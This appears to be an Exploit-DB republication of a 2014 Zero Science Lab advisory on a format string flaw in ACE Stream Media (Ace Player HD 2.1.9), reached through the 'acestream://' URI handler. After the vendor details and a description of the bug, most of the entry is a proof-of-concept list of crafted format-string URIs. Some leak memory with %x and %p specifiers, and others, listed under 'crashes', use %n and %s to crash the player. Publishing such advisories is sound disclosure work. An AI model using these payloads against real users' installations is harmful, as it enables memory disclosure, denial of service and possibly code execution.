ACE Stream Media 2.1 - 'acestream://' Format String

EDB-ID:

30666

CVE:

N/A


Author:

LiquidWorm

Type:

local


Platform:

Multiple

Date:

2014-01-03



ACE Stream Media 2.1 (acestream://) Format String Exploit PoC


Vendor: ACE Stream
Product web page: http://www.acestream.org
Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)

Summary: Ace Stream is an innovative multimedia platform of a new
generation, which includes different products and solutions for
ordinary Internet users as well as for professional members of the
multimedia market. Ace Stream uses in its core, P2P (peer-to-peer)
technology, BitTorrent protocol, which is acknowledged as the most
effective protocol to transfer/deliver 'heavy content'.

Desc: ACE Stream Media (Ace Player HD) is prone to a remote format
string vulnerability because the application fails to properly
sanitize user-supplied input thru the URI using the 'acestream://'
protocol before including it in the format-specifier argument of
a formatted-printing function. A remote attacker may exploit this
issue to execute arbitrary code with the privileges of the user
running the affected application and/or cause memory address disclosure.
Failed exploit attempts may cause denial-of-service (DoS) conditions.


Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5165
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php


30.12.2013

--


format md:

acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
acestream://AAAA%s
acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08d
acestream://%i%i%i%i
acestream://%c%c%c%c
acestream://%f%f%f%f
acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
acestream://%15.10s.%15.10s
acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
acestream://%0a%0d
acestream://%AA
acestream://%p%p%p%p%s

crashes:

acestream://AAAA%08s
acestream://AAAA%n
acestream://%08s
acestream://%p%p%p%p%s%n
acestream://%n
acestream://%s%s%s%s
acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA